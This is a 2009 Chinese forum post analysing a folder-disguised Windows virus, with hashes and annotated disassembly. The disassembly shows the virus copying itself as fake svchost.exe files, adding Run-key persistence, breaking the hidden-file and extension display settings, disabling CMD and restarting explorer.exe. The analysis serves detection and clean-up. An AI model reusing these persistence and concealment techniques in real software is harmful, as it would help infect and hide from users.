文件夹病毒简单分析
本帖最后由 豪斯登堡新郎 于 2009-6-22 08:33 编辑
文件: Programs AI_Boy.exe
大小: 254021 字节
MD5: AD4A82D68F7831B1FC960D3F1021D11E
SHA1: 3428ADD6219D30891E5441EC27200FE4430258DD
CRC32: 98B01919
开发语言:Microsoft Visual C++ 6.0
卡巴斯基:N/A
瑞星:N/A
金山毒霸:Heur.Win32.Generic_01.h
只做非常简单的行为分析，疏漏之处还请见谅。
1.创建互斥体
; --- 004010A0: main-like entry (MSVC 6, unoptimized build) — excerpt; the body continues at 004010CF further down ---
; NOTE(review): the forum paste dropped bracketed memory operands ([ebp-xxx], es:[edi]); where one
; matters it is recovered from the opcode bytes shown on the same line.
004010A0 > \55 push ebp
004010A1 .8BEC mov ebp, esp
004010A3 .81EC 08050000 sub esp, 508 ; 0x508 bytes of locals
004010A9 .53 push ebx
004010AA .56 push esi
004010AB .57 push edi
004010AC .8DBD F8FAFFFF lea edi, dword ptr ; edi = [ebp-508] (from opcode bytes)
004010B2 .B9 42010000 mov ecx, 142 ; 0x142 dwords == 0x508 bytes
004010B7 .B8 CCCCCCCC mov eax, CCCCCCCC
004010BC .F3:AB rep stos dword ptr es: ; fill the whole local frame with 0xCC — the MSVC debug-build stack pattern
004010BE .8BF4 mov esi, esp ; esp snapshot; compared again after each call (presumably the CRT _chkesp check at 00403BC0 — confirm)
004010C0 .68 78E14200 push 0042E178 ; /MutexName = "TEST_VIRUS_ONE"
004010C5 .6A 00 push 0 ; |InitialOwner = FALSE
004010C7 .6A 00 push 0 ; |pSecurity = NULL
004010C9 .FF15 B0834300 call dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA: creates the mutex "TEST_VIRUS_ONE" as a single-instance guard; GetLastError()==ERROR_ALREADY_EXISTS is tested at 004010E5. The mutex name is a usable host IoC.
2.获取系统信息
; --- 004040B0: excerpt. The push -1 / scope-table / handler / fs:[0] sequence is the classic MSVC SEH
; prologue and GetVersion is what the MSVC 6 CRT start-up stub calls first, so this looks like CRT
; start-up code rather than sample-specific logic — confirm before treating "gets system info" as a behaviour of the virus. ---
004040B0 >/$55 push ebp
004040B1|.8BEC mov ebp, esp
004040B3|.6A FF push -1 ; SEH frame: initial trylevel = -1
004040B5|.68 A8E84200 push 0042E8A8 ; SEH scope table
004040BA|.68 D0634000 push 004063D0 ; SEH handler
004040BF|.64:A1 0000000>mov eax, dword ptr fs: ; eax = fs:[0] (current exception-chain head)
004040C5|.50 push eax
004040C6|.64:8925 00000>mov dword ptr fs:, esp ; fs:[0] = esp — link the new frame into the chain
004040CD|.83C4 A4 add esp, -5C ; 0x5C bytes of locals
004040D0|.53 push ebx
004040D1|.56 push esi
004040D2|.57 push edi
004040D3|.8965 E8 mov dword ptr , esp ; [ebp-18] = esp (kept for unwinding)
004040D6|.FF15 5C844300 call dword ptr [<&KERNEL32.GetVersion>; GetVersion(): OS version word returned in eax
3.提权
; --- 00401B47: excerpt (function start not shown); only the privilege lookup is visible here ---
00401B47|.51 push ecx ; /pLocalId — receives the LUID
00401B48|.68 A8E14200 push 0042E1A8 ; |Privilege = "SeDebugPrivilege"
00401B4D|.6A 00 push 0 ; |SystemName = NULL (local machine)
00401B4F|.FF15 74834300 call dword ptr [<&ADVAPI32.LookupPriv>; \LookupPrivilegeValueA: resolves the LUID of SeDebugPrivilege. This only looks the value up; the AdjustTokenPrivileges call that would actually enable it is not in this excerpt, so "raises the privilege" is an inference.
4.创建病毒文件并运行进程
; --- 004010CF: continuation of 004010A0 (the mutex was just created). Excerpt ends at 004015AF, before the
; function's return at 004015C3. Control flow as visible here:
;   mutex already existed                    -> open the decoy folder in Explorer, return 0
;   C:\WINDOWS\svchost.exe does not exist    -> install: copy self + Recycle.exe, start both copies, return 0
;   own path == C:\WINDOWS\svchost.exe       -> start a worker thread, then loop forever (kill/restart explorer once, Sleep)
;   otherwise (running from a folder copy)   -> open the decoy folder in Explorer, return 0
; Buffers (from opcode bytes): 00435DEC = 260-byte own-path buffer, 00435CE8 = own-path prefix buffer,
; esi = esp snapshot for the 00403BC0 stack check (presumably CRT _chkesp — confirm).
004010CF .3BF4 cmp esi, esp
004010D1 .E8 EA2A0000 call 00403BC0 ; stack-pointer check after the API call (this pair repeats after every call below)
004010D6 .8BF4 mov esi, esp
004010D8 .FF15 E0834300 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
004010DE .3BF4 cmp esi, esp
004010E0 .E8 DB2A0000 call 00403BC0
004010E5 .3D B7000000 cmp eax, 0B7 ; 0xB7 == ERROR_ALREADY_EXISTS (183)
004010EA .0F85 9F000000 jnz 0040118F ; first instance -> 0040118F; fall through when another copy already holds the mutex
004010F0 .8BF4 mov esi, esp
004010F2 .68 04010000 push 104 ; /BufSize = 104 (260.)
004010F7 .68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004010FC .6A 00 push 0 ; |hModule = NULL
004010FE .FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA: own full path -> 00435DEC
00401104 .3BF4 cmp esi, esp
00401106 .E8 B52A0000 call 00403BC0
0040110B .68 EC5D4300 push 00435DEC
00401110 .E8 2B2A0000 call 00403B40 ; eax = length of the own path (00403B40 is used like strlen throughout — confirm)
00401115 .83C4 04 add esp, 4
00401118 .83E8 68 sub eax, 68 ; drop a fixed 0x68 (104) trailing chars — presumably the "<name>.exe AI_Boy...\<name> AI_Boy.exe" tail, leaving the original folder's path; confirm against the sample's on-disk layout
0040111B .50 push eax
0040111C .68 EC5D4300 push 00435DEC
00401121 .68 E85C4300 push 00435CE8
00401126 .E8 15290000 call 00403A40 ; 00403A40(00435CE8, 00435DEC, len-0x68): copies that prefix (strncpy-like — confirm)
0040112B .83C4 0C add esp, 0C
0040112E .68 EC5D4300 push 00435DEC
00401133 .E8 082A0000 call 00403B40
00401138 .83C4 04 add esp, 4
0040113B .C680 805C4300>mov byte ptr , 0 ; [eax+00435C80] = 0 — NUL-terminates 00435CE8 at index len-0x68 (00435C80 == 00435CE8-0x68)
00401142 .8BF4 mov esi, esp
00401144 .68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs" — the D7/"烂鎈" run is OllyDbg's broken GBK rendering of the user's desktop folder name (桌面 — confirm)
00401149 .68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy....\"
0040114E .8D85 FCFEFFFF lea eax, dword ptr ; | [ebp-104]
00401154 .50 push eax ; |s
00401155 .FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA: path of the real (hidden) folder -> [ebp-104]
0040115B .83C4 0C add esp, 0C
0040115E .3BF4 cmp esi, esp
00401160 .E8 5B2A0000 call 00403BC0
00401165 .8BF4 mov esi, esp
00401167 .6A 01 push 1 ; /IsShown = 1
00401169 .6A 00 push 0 ; |DefDir = NULL
0040116B .6A 00 push 0 ; |Parameters = NULL
0040116D .8D8D FCFEFFFF lea ecx, dword ptr ; | [ebp-104]
00401173 .51 push ecx ; |FileName
00401174 .68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401179 .6A 00 push 0 ; |hWnd = NULL
0040117B .FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA("open", folder): opens the original folder so the user sees what they double-clicked on
00401181 .3BF4 cmp esi, esp
00401183 .E8 382A0000 call 00403BC0
00401188 .33C0 xor eax, eax ; return 0
0040118A .E9 34040000 jmp 004015C3 ; -> epilogue (outside this excerpt)
0040118F >8BF4 mov esi, esp ; first instance: is the payload already installed?
00401191 .6A 00 push 0 ; /hTemplateFile = NULL
00401193 .6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00401195 .6A 03 push 3 ; |Mode = OPEN_EXISTING
00401197 .6A 00 push 0 ; |pSecurity = NULL
00401199 .6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
0040119B .68 00000080 push 80000000 ; |Access = GENERIC_READ
004011A0 .68 301A4300 push 00431A30 ; |FileName = "C:\WINDOWS\svchost.exe"
004011A5 .FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA with OPEN_EXISTING|GENERIC_READ: an existence test of C:\WINDOWS\svchost.exe, not a create. The returned handle is not closed anywhere in this excerpt.
004011AB .3BF4 cmp esi, esp
004011AD .E8 0E2A0000 call 00403BC0
004011B2 .83F8 FF cmp eax, -1 ; INVALID_HANDLE_VALUE -> not installed yet
004011B5 .0F85 04020000 jnz 004013BF ; already present -> 004013BF
004011BB .8BF4 mov esi, esp ; --- install path: same own-path prefix computation as 004010F2..0040113B ---
004011BD .68 04010000 push 104 ; /BufSize = 104 (260.)
004011C2 .68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004011C7 .6A 00 push 0 ; |hModule = NULL
004011C9 .FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004011CF .3BF4 cmp esi, esp
004011D1 .E8 EA290000 call 00403BC0
004011D6 .68 EC5D4300 push 00435DEC
004011DB .E8 60290000 call 00403B40
004011E0 .83C4 04 add esp, 4
004011E3 .83E8 68 sub eax, 68
004011E6 .50 push eax
004011E7 .68 EC5D4300 push 00435DEC
004011EC .68 E85C4300 push 00435CE8
004011F1 .E8 4A280000 call 00403A40
004011F6 .83C4 0C add esp, 0C
004011F9 .68 EC5D4300 push 00435DEC
004011FE .E8 3D290000 call 00403B40
00401203 .83C4 04 add esp, 4
00401206 .C680 805C4300>mov byte ptr , 0
0040120D .8BF4 mov esi, esp
0040120F .68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs"
00401214 .68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy....\"
00401219 .8D95 F4FCFFFF lea edx, dword ptr ; | [ebp-30C]
0040121F .52 push edx ; |s
00401220 .FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00401226 .83C4 0C add esp, 0C
00401229 .3BF4 cmp esi, esp
0040122B .E8 90290000 call 00403BC0
00401230 .8BF4 mov esi, esp
00401232 .6A 01 push 1 ; /IsShown = 1
00401234 .6A 00 push 0 ; |DefDir = NULL
00401236 .6A 00 push 0 ; |Parameters = NULL
00401238 .8D85 F4FCFFFF lea eax, dword ptr ; | [ebp-30C]
0040123E .50 push eax ; |FileName
0040123F .68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401244 .6A 00 push 0 ; |hWnd = NULL
00401246 .FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA: open the decoy's original folder (same as above)
0040124C .3BF4 cmp esi, esp
0040124E .E8 6D290000 call 00403BC0
00401253 .8BF4 mov esi, esp
00401255 .6A 00 push 0 ; /hTemplateFile = NULL
00401257 .6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00401259 .6A 03 push 3 ; |Mode = OPEN_EXISTING
0040125B .6A 00 push 0 ; |pSecurity = NULL
0040125D .6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
0040125F .68 00000080 push 80000000 ; |Access = GENERIC_READ
00401264 .68 CCE04200 push 0042E0CC ; |FileName = "C:\Windows\zhoutun.txt"
00401269 .FF15 14844300 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA OPEN_EXISTING: existence test of C:\Windows\zhoutun.txt, not a create
0040126F .3BF4 cmp esi, esp
00401271 .E8 4A290000 call 00403BC0
00401276 .83F8 FF cmp eax, -1
00401279 .74 07 je short 00401282 ; file absent -> continue installing
0040127B .33C0 xor eax, eax ; file present -> return 0 without installing: C:\Windows\zhoutun.txt acts as a kill-switch / "already done" marker
0040127D .E9 41030000 jmp 004015C3
00401282 >8BF4 mov esi, esp
00401284 .68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs"
00401289 .68 38E04200 push 0042E038 ; |Format = "%s.exe AI_Boy....\\Recycle.exe"
0040128E .8D8D F8FDFFFF lea ecx, dword ptr ; | [ebp-208]
00401294 .51 push ecx ; |s
00401295 .FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA: "<decoy folder>\Recycle.exe" -> [ebp-208]
0040129B .83C4 0C add esp, 0C
0040129E .3BF4 cmp esi, esp
004012A0 .E8 1B290000 call 00403BC0
004012A5 .8BF4 mov esi, esp
004012A7 .6A 00 push 0 ; /FailIfExists = FALSE
004012A9 .68 301A4300 push 00431A30 ; |NewFileName = "C:\WINDOWS\svchost.exe"
004012AE .68 EC5D4300 push 00435DEC ; |ExistingFileName = own path (from GetModuleFileNameA above) = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs AI_Boy.exe"
004012B3 .FF15 18844300 call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA: copies itself to C:\WINDOWS\svchost.exe (note: the real svchost.exe lives in system32; this path is a dropped-file IoC)
004012B9 .3BF4 cmp esi, esp
004012BB .E8 00290000 call 00403BC0
004012C0 .8BF4 mov esi, esp
004012C2 .6A 00 push 0 ; /FailIfExists = FALSE
004012C4 .68 341B4300 push 00431B34 ; |NewFileName = "C:\WINDOWS\system\svchost.exe"
004012C9 .8D95 F8FDFFFF lea edx, dword ptr ; | [ebp-208] — the "<decoy folder>\Recycle.exe" string built at 00401295
004012CF .52 push edx ; |ExistingFileName
004012D0 .FF15 18844300 call dword ptr [<&KERNEL32.CopyFileA>>; CopyFileA: copies Recycle.exe (the companion file in the decoy folder), not itself, to C:\WINDOWS\system\svchost.exe
004012D6 .3BF4 cmp esi, esp
004012D8 .E8 E3280000 call 00403BC0
004012DD .C785 B0FCFFFF>mov dword ptr , 44 ; STARTUPINFO at [ebp-350]: cb = 0x44
004012E7 .B9 10000000 mov ecx, 10
004012EC .33C0 xor eax, eax
004012EE .8DBD B4FCFFFF lea edi, dword ptr ; [ebp-34C]
004012F4 .F3:AB rep stos dword ptr es: ; zero the remaining 16 dwords of STARTUPINFO
004012F6 .C785 DCFCFFFF>mov dword ptr , 40 ; [ebp-324] = STARTUPINFO+0x2C (dwFlags) = 0x40
00401300 .8BF4 mov esi, esp
00401302 .8D85 A0FCFFFF lea eax, dword ptr ; PROCESS_INFORMATION at [ebp-360]
00401308 .50 push eax ; /pProcessInfo
00401309 .8D8D B0FCFFFF lea ecx, dword ptr ; |
0040130F .51 push ecx ; |pStartupInfo
00401310 .6A 00 push 0 ; |CurrentDir = NULL
00401312 .6A 00 push 0 ; |pEnvironment = NULL
00401314 .6A 00 push 0 ; |CreationFlags = 0
00401316 .6A 00 push 0 ; |InheritHandles = FALSE
00401318 .6A 00 push 0 ; |pThreadSecurity = NULL
0040131A .6A 00 push 0 ; |pProcessSecurity = NULL
0040131C .68 341B4300 push 00431B34 ; |CommandLine = "C:\WINDOWS\system\svchost.exe"
00401321 .6A 00 push 0 ; |ModuleFileName = NULL
00401323 .FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; \CreateProcessA: starts the Recycle.exe copy as C:\WINDOWS\system\svchost.exe
00401329 .3BF4 cmp esi, esp
0040132B .E8 90280000 call 00403BC0
00401330 .8BF4 mov esi, esp
00401332 .8B95 A4FCFFFF mov edx, dword ptr ; [ebp-35C] = PROCESS_INFORMATION.hThread
00401338 .52 push edx ; /hObject
00401339 .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040133F .3BF4 cmp esi, esp
00401341 .E8 7A280000 call 00403BC0
00401346 .8BF4 mov esi, esp
00401348 .8B85 A0FCFFFF mov eax, dword ptr ; [ebp-360] = PROCESS_INFORMATION.hProcess
0040134E .50 push eax ; /hObject
0040134F .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401355 .3BF4 cmp esi, esp
00401357 .E8 64280000 call 00403BC0
0040135C .8BF4 mov esi, esp
0040135E .8D8D A0FCFFFF lea ecx, dword ptr ; reuse the same STARTUPINFO / PROCESS_INFORMATION
00401364 .51 push ecx ; /pProcessInfo
00401365 .8D95 B0FCFFFF lea edx, dword ptr ; |
0040136B .52 push edx ; |pStartupInfo
0040136C .6A 00 push 0 ; |CurrentDir = NULL
0040136E .6A 00 push 0 ; |pEnvironment = NULL
00401370 .6A 00 push 0 ; |CreationFlags = 0
00401372 .6A 00 push 0 ; |InheritHandles = FALSE
00401374 .6A 00 push 0 ; |pThreadSecurity = NULL
00401376 .6A 00 push 0 ; |pProcessSecurity = NULL
00401378 .68 301A4300 push 00431A30 ; |CommandLine = "C:\WINDOWS\svchost.exe"
0040137D .6A 00 push 0 ; |ModuleFileName = NULL
0040137F .FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; CreateProcessA: starts the self-copy C:\WINDOWS\svchost.exe
00401385 .3BF4 cmp esi, esp ;
00401387 .E8 34280000 call 00403BC0
0040138C .8BF4 mov esi, esp
0040138E .8B85 A4FCFFFF mov eax, dword ptr ; hThread
00401394 .50 push eax ; /hObject
00401395 .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040139B .3BF4 cmp esi, esp
0040139D .E8 1E280000 call 00403BC0
004013A2 .8BF4 mov esi, esp
004013A4 .8B8D A0FCFFFF mov ecx, dword ptr ; hProcess
004013AA .51 push ecx ; /hObject
004013AB .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004013B1 .3BF4 cmp esi, esp
004013B3 .E8 08280000 call 00403BC0
004013B8 .33C0 xor eax, eax ; installer done: return 0
004013BA .E9 04020000 jmp 004015C3
004013BF >8BF4 mov esi, esp ; --- C:\WINDOWS\svchost.exe already exists: am I that copy? ---
004013C1 .68 04010000 push 104 ; /BufSize = 104 (260.)
004013C6 .68 EC5D4300 push 00435DEC ; |PathBuffer = Programs.00435DEC
004013CB .6A 00 push 0 ; |hModule = NULL
004013CD .FF15 10844300 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004013D3 .3BF4 cmp esi, esp
004013D5 .E8 E6270000 call 00403BC0
004013DA .68 301A4300 push 00431A30 ;ASCII "C:\WINDOWS\svchost.exe"
004013DF .68 EC5D4300 push 00435DEC
004013E4 .E8 17460100 call 00415A00 ; 00415A00(own path, "C:\WINDOWS\svchost.exe"): the eax==0 branch below is taken as "equal", so this is presumably a strcmp-like compare — confirm
004013E9 .83C4 08 add esp, 8
004013EC .85C0 test eax, eax
004013EE .0F84 84000000 je 00401478 ; running as the installed copy -> 00401478
004013F4 .68 EC5D4300 push 00435DEC ; otherwise (running from a folder copy): open the decoy's original folder and exit, as at 0040110B..0040118A
004013F9 .E8 42270000 call 00403B40
004013FE .83C4 04 add esp, 4
00401401 .83E8 68 sub eax, 68
00401404 .50 push eax
00401405 .68 EC5D4300 push 00435DEC
0040140A .68 E85C4300 push 00435CE8
0040140F .E8 2C260000 call 00403A40
00401414 .83C4 0C add esp, 0C
00401417 .68 EC5D4300 push 00435DEC
0040141C .E8 1F270000 call 00403B40
00401421 .83C4 04 add esp, 4
00401424 .C680 805C4300>mov byte ptr , 0
0040142B .8BF4 mov esi, esp
0040142D .68 E85C4300 push 00435CE8 ; /<%s> = "C:\Documents and Settings\Administrator\",D7,"烂鎈Programs"
00401432 .68 F0E04200 push 0042E0F0 ; |Format = "%s.exe AI_Boy....\"
00401437 .8D95 9CFBFFFF lea edx, dword ptr ; | [ebp-464]
0040143D .52 push edx ; |s
0040143E .FF15 14864300 call dword ptr [<&USER32.wsprintfA>]; \wsprintfA
00401444 .83C4 0C add esp, 0C
00401447 .3BF4 cmp esi, esp
00401449 .E8 72270000 call 00403BC0
0040144E .8BF4 mov esi, esp
00401450 .6A 01 push 1 ; /IsShown = 1
00401452 .6A 00 push 0 ; |DefDir = NULL
00401454 .6A 00 push 0 ; |Parameters = NULL
00401456 .8D85 9CFBFFFF lea eax, dword ptr ; | [ebp-464]
0040145C .50 push eax ; |FileName
0040145D .68 E8E04200 push 0042E0E8 ; |Operation = "open"
00401462 .6A 00 push 0 ; |hWnd = NULL
00401464 .FF15 E4854300 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
0040146A .3BF4 cmp esi, esp
0040146C .E8 4F270000 call 00403BC0
00401471 .33C0 xor eax, eax
00401473 .E9 4B010000 jmp 004015C3
00401478 >E8 BAFBFFFF call 00401037 ; --- resident copy: thunk into another routine (target not in this excerpt) ---
0040147D .8BF4 mov esi, esp
0040147F .8D8D 98FBFFFF lea ecx, dword ptr ; [ebp-468] receives the thread id
00401485 .51 push ecx ; /pThreadId
00401486 .6A 00 push 0 ; |CreationFlags = 0
00401488 .6A 00 push 0 ; |pThreadParm = NULL
0040148A .68 2D104000 push 0040102D ; |ThreadFunction = Programs.0040102D (thunk; target not shown here)
0040148F .6A 00 push 0 ; |StackSize = 0
00401491 .6A 00 push 0 ; |pSecurity = NULL
00401493 .FF15 24844300 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread: background worker; the thread keeps running after its handle is closed below
00401499 .3BF4 cmp esi, esp
0040149B .E8 20270000 call 00403BC0
004014A0 .8985 94FBFFFF mov dword ptr , eax ; [ebp-46C] = hThread
004014A6 .8BF4 mov esi, esp
004014A8 .8B95 94FBFFFF mov edx, dword ptr
004014AE .52 push edx ; /hObject
004014AF .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle(hThread)
004014B5 .3BF4 cmp esi, esp
004014B7 .E8 04270000 call 00403BC0
004014BC .C785 90FBFFFF>mov dword ptr , 0 ; [ebp-470] = 0: "explorer restarted" counter
004014C6 >B8 01000000 mov eax, 1 ; loop head: while (1)
004014CB .85C0 test eax, eax
004014CD .0F84 EE000000 je 004015C1 ; never taken (eax is the constant 1)
004014D3 .E8 37FBFFFF call 0040100F ; three thunks called each iteration; targets not in this excerpt
004014D8 .E8 55FBFFFF call 00401032
004014DD .E8 37FBFFFF call 00401019
004014E2 .83BD 90FBFFFF>cmp dword ptr , 0 ; [ebp-470] != 0 -> explorer was already restarted once
004014E9 .0F85 B9000000 jnz 004015A8
004014EF .68 1CE04200 push 0042E01C ;ASCII "c:\WINDOWS\explorer.exe"
004014F4 .E8 2FFBFFFF call 00401028 ; 00401028("c:\WINDOWS\explorer.exe") -> eax is used as hProcess below, so it presumably finds the process by image path and opens it (target not shown — confirm)
004014F9 .83C4 04 add esp, 4
004014FC .8985 8CFBFFFF mov dword ptr , eax ; [ebp-474] = process handle
00401502 .8BF4 mov esi, esp
00401504 .6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
00401506 .8B8D 8CFBFFFF mov ecx, dword ptr ; |
0040150C .51 push ecx ; |hProcess
0040150D .FF15 28844300 call dword ptr [<&KERNEL32.TerminateP>; \TerminateProcess: kills explorer.exe (not "enumerates" as the original note says)
00401513 .3BF4 cmp esi, esp
00401515 .E8 A6260000 call 00403BC0
0040151A .C785 48FBFFFF>mov dword ptr , 44 ; STARTUPINFO at [ebp-4B8]: cb = 0x44
00401524 .B9 10000000 mov ecx, 10
00401529 .33C0 xor eax, eax
0040152B .8DBD 4CFBFFFF lea edi, dword ptr ; [ebp-4B4]
00401531 .F3:AB rep stos dword ptr es:
00401533 .C785 74FBFFFF>mov dword ptr , 40 ; [ebp-48C] = dwFlags = 0x40
0040153D .8BF4 mov esi, esp
0040153F .8D95 38FBFFFF lea edx, dword ptr ; PROCESS_INFORMATION at [ebp-4C8]
00401545 .52 push edx ; /pProcessInfo
00401546 .8D85 48FBFFFF lea eax, dword ptr ; |
0040154C .50 push eax ; |pStartupInfo
0040154D .6A 00 push 0 ; |CurrentDir = NULL
0040154F .6A 00 push 0 ; |pEnvironment = NULL
00401551 .6A 00 push 0 ; |CreationFlags = 0
00401553 .6A 00 push 0 ; |InheritHandles = FALSE
00401555 .6A 00 push 0 ; |pThreadSecurity = NULL
00401557 .6A 00 push 0 ; |pProcessSecurity = NULL
00401559 .68 1CE04200 push 0042E01C ; |CommandLine = "c:\WINDOWS\explorer.exe"
0040155E .6A 00 push 0 ; |ModuleFileName = NULL
00401560 .FF15 1C844300 call dword ptr [<&KERNEL32.CreateProc>; \CreateProcessA: relaunches explorer.exe — presumably so Explorer re-reads the folder-view settings changed in the registry (confirm)
00401566 .3BF4 cmp esi, esp
00401568 .E8 53260000 call 00403BC0
0040156D .8BF4 mov esi, esp
0040156F .8B8D 38FBFFFF mov ecx, dword ptr ; [ebp-4C8] = hProcess
00401575 .51 push ecx ; /hObject
00401576 .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
0040157C .3BF4 cmp esi, esp
0040157E .E8 3D260000 call 00403BC0
00401583 .8BF4 mov esi, esp
00401585 .8B95 3CFBFFFF mov edx, dword ptr ; [ebp-4C4] = hThread
0040158B .52 push edx ; /hObject
0040158C .FF15 20844300 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401592 .3BF4 cmp esi, esp
00401594 .E8 27260000 call 00403BC0
00401599 .8B85 90FBFFFF mov eax, dword ptr ; [ebp-470]++ so the kill/restart happens only once
0040159F .83C0 01 add eax, 1
004015A2 .8985 90FBFFFF mov dword ptr , eax
004015A8 >8BF4 mov esi, esp
004015AA .68 E8030000 push 3E8 ; /Timeout = 1000. ms
004015AF .FF15 30844300 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep(1000): 1 second per iteration (the original note says 10 s; 0x3E8 ms is 1 s). The jump back to 004014C6 is outside this excerpt.
5.修改注册表：添加启动项、破坏"显示隐藏文件"及"显示已知文件后缀"功能、禁用 cmd
; --- 00401BD0: registry tampering routine (complete). Effects, in order:
;   1. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL : CheckedValue   = 11-byte REG_SZ from 0042E38C
;   2. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt    : UnCheckedValue = REG_DWORD 1
;   3. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run : svchost1.exe = "C:\windows\svchost.exe", svchost2.exe = "C:\windows\system\svchost.exe"
;   4. HKCU\Software\Policies\Microsoft\Windows\System : DisableCMD = REG_DWORD 2
; Every Reg* return code is discarded (each call is followed only by the esp check), so nothing here fails loudly.
; The first three writes need write access to HKLM; all four value names / paths are host IoCs for detection and clean-up.
; Stack offsets below are recovered from the opcode bytes (the paste dropped the bracketed operands).
00401BD0/> \55 push ebp
00401BD1|.8BEC mov ebp, esp
00401BD3|.81EC 7C020000 sub esp, 27C ; 0x27C bytes of locals
00401BD9|.53 push ebx
00401BDA|.56 push esi
00401BDB|.57 push edi
00401BDC|.8DBD 84FDFFFF lea edi, dword ptr ; [ebp-27C]
00401BE2|.B9 9F000000 mov ecx, 9F
00401BE7|.B8 CCCCCCCC mov eax, CCCCCCCC
00401BEC|.F3:AB rep stos dword ptr es: ; 0xCC debug-build stack fill
00401BEE|.A1 8CE34200 mov eax, dword ptr ; [0042E38C] — copy an 11-byte constant (4+4+2+1) to the local at [ebp-10]
00401BF3|.8945 F0 mov dword ptr , eax ; [ebp-10]
00401BF6|.8B0D 90E34200 mov ecx, dword ptr ; [0042E390]
00401BFC|.894D F4 mov dword ptr , ecx ; [ebp-C]
00401BFF|.66:8B15 94E34>mov dx, word ptr ; [0042E394]
00401C06|.66:8955 F8 mov word ptr , dx ; [ebp-8]
00401C0A|.A0 96E34200 mov al, byte ptr ; [0042E396]
00401C0F|.8845 FA mov byte ptr , al ; [ebp-6]
00401C12|.C745 EC 28E34>mov dword ptr , 0042E328 ;ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" -> [ebp-14]
00401C19|.8BF4 mov esi, esp
00401C1B|.8D4D FC lea ecx, dword ptr ; [ebp-4] receives the key handle
00401C1E|.51 push ecx ; /pHandle
00401C1F|.68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
00401C24|.6A 00 push 0 ; |Reserved = 0
00401C26|.8B55 EC mov edx, dword ptr ; |
00401C29|.52 push edx ; |Subkey
00401C2A|.68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401C2F|.FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA — return code not checked
00401C35|.3BF4 cmp esi, esp
00401C37|.E8 841F0000 call 00403BC0
00401C3C|.8BF4 mov esi, esp
00401C3E|.6A 0B push 0B ; /BufSize = B (11.)
00401C40|.8D45 F0 lea eax, dword ptr ; | [ebp-10], the 11 bytes copied from 0042E38C (contents not shown in this dump)
00401C43|.50 push eax ; |Buffer
00401C44|.6A 01 push 1 ; |ValueType = REG_SZ
00401C46|.6A 00 push 0 ; |Reserved = 0
00401C48|.68 18E34200 push 0042E318 ; |ValueName = "CheckedValue"
00401C4D|.8B4D FC mov ecx, dword ptr ; |
00401C50|.51 push ecx ; |hKey
00401C51|.FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA: rewrites ...\Folder\Hidden\SHOWALL\CheckedValue as a REG_SZ (Explorer expects a DWORD here, which is presumably what breaks the "Show hidden files" option — confirm). The original note's "0x00000001" is not visible in this dump.
00401C57|.3BF4 cmp esi, esp
00401C59|.E8 621F0000 call 00403BC0
00401C5E|.8BF4 mov esi, esp
00401C60|.8B55 FC mov edx, dword ptr
00401C63|.52 push edx ; /hKey
00401C64|.FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401C6A|.3BF4 cmp esi, esp
00401C6C|.E8 4F1F0000 call 00403BC0
00401C71|.C745 E4 01000>mov dword ptr , 1 ; [ebp-1C] = 1 (DWORD written below)
